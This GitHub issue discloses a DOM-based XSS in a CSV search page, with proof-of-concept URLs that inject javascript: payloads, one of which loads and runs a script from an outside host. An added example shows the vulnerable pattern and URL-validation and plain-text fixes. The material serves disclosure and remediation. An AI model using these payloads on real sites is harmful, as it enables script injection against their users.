Closed dxa4481 closed 8 years ago
There's a DOM based XSS as demonstrated here
http://devprogress.us/csv-simple-search/?externalFileUrl=javascript:alert(1)
and here
http://devprogress.us/csv-simple-search/?externalFileUrl=javascript:(function()%7Bjavascript:var%20s%3Ddocument.createElement(%27script%27)%3Bs.setAttribute(%27src%27,%27https://nthitz.github.io/turndownforwhatjs/tdfw.js%27)%3Bdocument.body.appendChild(s)%3B%7D)()%3B
There are two ways to fix this issue: one is to validate the URLs, the other is to just remove the hyperlink. For a quick fix I removed the hyperlink
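Both fixes named above, side by side with the vulnerable pattern, as an added example that is not code from the csv-simple-search project or from this issue. It assumes the page reads `externalFileUrl` from the query string and builds an anchor from it; the function names (`readExternalFileUrl`, `safeExternalUrl`, `validatedLinkHtml`, `plainTextHtml`) and the query strings are constructed for illustration, with the `javascript:` payloads taken from the issue.

```javascript
// Added example, not the csv-simple-search project's own code. Shows the
// vulnerable pattern and the two fixes from the issue: validate the URL, or
// render it as text instead of a hyperlink. Names and inputs are assumptions.

// Constructed query strings; the javascript: payloads follow the issue.
const BENIGN_QUERY = '?externalFileUrl=https%3A%2F%2Fexample.org%2Fdata.csv';
const XSS_QUERY = '?externalFileUrl=javascript:alert(1)';
const XSS_QUERY_2 =
  '?externalFileUrl=javascript:(function()%7Bjavascript:var%20s%3Ddocument.createElement(%27script%27)%3B%7D)()%3B';

function readExternalFileUrl(search) {
  return new URLSearchParams(search).get('externalFileUrl');
}

// Vulnerable pattern: the raw parameter lands in href, so a javascript: URL
// executes as soon as the link is clicked (DOM-based XSS).
function vulnerableLinkHtml(search) {
  const url = readExternalFileUrl(search);
  return `<a href="${url}">${url}</a>`;
}

// Fix 1: validate. Parse with the URL constructor and accept only http(s).
// Returns null for javascript:, data:, relative paths and unparsable input.
function safeExternalUrl(raw) {
  if (typeof raw !== 'string') return null;
  let parsed;
  try {
    parsed = new URL(raw); // no base URL: relative strings throw and are rejected
  } catch {
    return null;
  }
  // The parser lowercases the scheme and trims leading whitespace, so
  // " JavaScript:alert(1)" still ends up as protocol "javascript:" and is rejected.
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return parsed.href;
}

// Minimal HTML escaping for the text and attribute contexts used below.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function validatedLinkHtml(search) {
  const safe = safeExternalUrl(readExternalFileUrl(search));
  if (safe === null) return ''; // rejected URL: render no link at all
  const text = escapeHtml(safe);
  return `<a href="${text}">${text}</a>`;
}

// Fix 2 (the quick fix applied in the issue): no hyperlink, value shown as text.
function plainTextHtml(search) {
  const raw = readExternalFileUrl(search);
  return raw === null ? '' : `<span>${escapeHtml(raw)}</span>`;
}
```

Checking `parsed.protocol` after parsing, rather than matching the raw string against `^https?:`, is what makes the allow-list hold up against case and whitespace variants of the scheme; an allow-list of schemes is also the right shape here, since a deny-list that only blocks `javascript:` would still let `data:` through.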
👍
:+1: ship plz :ship: